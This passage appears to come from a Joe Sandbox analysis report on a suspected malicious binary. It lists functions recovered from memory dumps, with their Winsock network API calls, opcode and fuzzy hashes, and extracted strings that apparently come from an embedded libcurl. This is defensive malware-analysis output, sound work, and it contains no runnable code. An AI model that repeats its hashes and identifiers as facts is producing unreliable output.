                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: gethostname
                                            • String ID:
                                            • API String ID: 144339138-0
                                            • Opcode ID: c5b88dcb4b9d2b7660bfb2bbe61e82e5220004c749fa712b2ac0ce9058502fde
                                            • Instruction ID: 886d42d26ac84bdb003694dcad21ebd49cbb77fa59604f47b432e3e7e73de711
                                            • Opcode Fuzzy Hash: c5b88dcb4b9d2b7660bfb2bbe61e82e5220004c749fa712b2ac0ce9058502fde
                                            • Instruction Fuzzy Hash: 9B51A0706043008BE7B0DB27DD4A72776E8AF4171EF14193DED8A87691E775E888C702
                                            Function 0096AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                            Download Yara Rule
                                            APIs
                                            • getsockname.WS2_32(?,?,00000080), ref: 0096AFD1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: getsockname
                                            • String ID:
                                            • API String ID: 3358416759-0
                                            • Opcode ID: de1e4a533987e4f8fcfbc4faad9277bf0b46aa92a3adb15dd56d19933d5253e8
                                            • Instruction ID: cad4d8d6ef054e97afaa8f5075b6aacf1a179a8dcd247b953661939d0ab97e0a
                                            • Opcode Fuzzy Hash: de1e4a533987e4f8fcfbc4faad9277bf0b46aa92a3adb15dd56d19933d5253e8
                                            • Instruction Fuzzy Hash: A011967080878595EB268F18D4027F6F3F8EFD0329F109A19E59942150F7365AC58BC2
                                            Function 0096A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0096A97E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID:
                                            • API String ID: 2809346765-0
                                            • Opcode ID: 3cb2bda3c5c560335e2af28692697fb779ead1548e09378ddb97eff788106e39
                                            • Instruction ID: 72c361baa624ecf683859b0db9d018a16f9e698b3f40585e84846b44d4cad8d5
                                            • Opcode Fuzzy Hash: 3cb2bda3c5c560335e2af28692697fb779ead1548e09378ddb97eff788106e39
                                            • Instruction Fuzzy Hash: 5201A272B01710AFD6148F25DC45B5AB7A5EF84720F168659EA982B361C331AC108BD1
                                            Function 0096AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • socket.WS2_32(?,0096B280,00000000,-00000001,00000000,0096B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0096AF67
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: socket
                                            • String ID:
                                            • API String ID: 98920635-0
                                            • Opcode ID: 0cff25c7f5fe15117874fcec804a6cf760e1f2648f8b576b487f854c69ea5d87
                                            • Instruction ID: 212fb43be199ecb0dce05da29b790fc39e2e7965c19288a403f8ec7953346f21
                                            • Opcode Fuzzy Hash: 0cff25c7f5fe15117874fcec804a6cf760e1f2648f8b576b487f854c69ea5d87
                                            • Instruction Fuzzy Hash: 17E0E5B6A093216FD664DA58E944AABF3ADEFC4B20F055A49B85467304C330AC508BE2
                                            Function 0096B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • closesocket.WS2_32(?,00969422,?,?,?,?,?,?,?,?,?,?,?,00953377,00D34C60,00000000), ref: 0096B04D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: closesocket
                                            • String ID:
                                            • API String ID: 2781271927-0
                                            • Opcode ID: d8d7da2d8ae23dc4ff6d0a1cb22cb6165b58175ab9bf24f6550eed4d277abc74
                                            • Instruction ID: f4a5fa775fe79657379e7d7ce39d9171aa88e4a73e898a77cedbecdc96fca6bc
                                            • Opcode Fuzzy Hash: d8d7da2d8ae23dc4ff6d0a1cb22cb6165b58175ab9bf24f6550eed4d277abc74
                                            • Instruction Fuzzy Hash: E1D0123870020197CA249A14C994A6B7A6F7FD1710FA9CB68E42C8A559E73BDC879641
                                            Function 009067E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                            Download Yara Rule
                                            APIs
                                            • ioctlsocket.WS2_32(?,8004667E,?,?,008DAF56,?,00000001), ref: 009067FB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: ioctlsocket
                                            • String ID:
                                            • API String ID: 3577187118-0
                                            • Opcode ID: 4dfd52ce2d9e906178b0f789d9704a4f36afb4e0f23f238318a8178881e8ca39
                                            • Instruction ID: 22ca030f1aabd4053b127202eebc86d86a953b218bbbe7a42af040ea4d72fcfd
                                            • Opcode Fuzzy Hash: 4dfd52ce2d9e906178b0f789d9704a4f36afb4e0f23f238318a8178881e8ca39
                                            • Instruction Fuzzy Hash: 21C012F1109200AFC60C4B24D855A6EB6D8DB85255F01591CB04A92180EA349454CA1A
                                            Function 008A31D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 80a0011adbd7dbb439506d311d97c06db93e92cbb5451ad9fa50126ceba24948
                                            • Instruction ID: c493937cf7e17f9be27cb2828c9fe55b11472ec7dba8fa01f6fb39f8e941822e
                                            • Opcode Fuzzy Hash: 80a0011adbd7dbb439506d311d97c06db93e92cbb5451ad9fa50126ceba24948
                                            • Instruction Fuzzy Hash: 5631A2B49093149BCB00EFB8D58569EBBF0FF45304F008969E898E7201E7749A84DFA2

                                            Non-executed Functions

                                            Function 008C4F70 Relevance: 20.9, Strings: 16, Instructions: 911COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$`W$`W$bW$bW$bW$file$file://%s%s%s$https$urlapi.c$vW$vW$xn--
                                            • API String ID: 0-3916423684
                                            • Opcode ID: fc5439fb008cd7afcc4c19b6032c39bf04a0f674ac09ef25fa4b3cf2d0122ae1
                                            • Instruction ID: 453fdbb25b9deb810e96541841ffea74273efe5a0b4e5a5d04ff748b309f613c
                                            • Opcode Fuzzy Hash: fc5439fb008cd7afcc4c19b6032c39bf04a0f674ac09ef25fa4b3cf2d0122ae1
                                            • Instruction Fuzzy Hash: 5F720671608B419FEB258A28C546FA677E2FF91344F08862CED85DB292E776F8C4C741
                                            Function 008B4940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                            • API String ID: 0-122532811
                                            • Opcode ID: fa43d17f87559635acca2bbea5de7d6ca5473b6dcaeb08c0f55af0d839e599aa
                                            • Instruction ID: e56da7f988f61ff8c7b8b2c76e2f527398b24fbe1420f82f5bfa492ced48c904
                                            • Opcode Fuzzy Hash: fa43d17f87559635acca2bbea5de7d6ca5473b6dcaeb08c0f55af0d839e599aa
                                            • Instruction Fuzzy Hash: 2142E771B08700AFD718DE28DC41BABB6EAFBC4704F048A2CF55D97392D775A9148B92
                                            Function 0096EF90 Relevance: 9.4, Strings: 7, Instructions: 688COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $.$;$?$?$xn--$xn--
                                            • API String ID: 0-543057197
                                            • Opcode ID: 011d1c4f55815c80e9c7475b8443b86753cef7dfa4d738555c0fdef4e87d25fa
                                            • Instruction ID: 3f301b636de7410e5d06bf1d10a0d04811c5b611253af086e383718a34556add
                                            • Opcode Fuzzy Hash: 011d1c4f55815c80e9c7475b8443b86753cef7dfa4d738555c0fdef4e87d25fa
                                            • Instruction Fuzzy Hash: C62206B2A083019BEB209A24EC65B6B77D9AFD4348F04493CF959D7292FB35DD04C792
                                            Function 00C2E050 Relevance: 9.1, APIs: 1, Strings: 3, Instructions: 2082COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $d$nil)
                                            • API String ID: 0-394766432
                                            • Opcode ID: 8a8557eaf1513895923dd0638674b8f0db18f74df2f0cd9eaeb3fc3943f3af88
                                            • Instruction ID: b5724def80c87647c86b6fb3b038de556899115f644806d8153bc43e2e383118
                                            • Opcode Fuzzy Hash: 8a8557eaf1513895923dd0638674b8f0db18f74df2f0cd9eaeb3fc3943f3af88
                                            • Instruction Fuzzy Hash: D2139B716083258FC720CF29D08062ABBF1BF89714F244A2DF9A59B761D771ED49DB82
                                            Function 008AA960 Relevance: 9.0, Strings: 6, Instructions: 1493COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
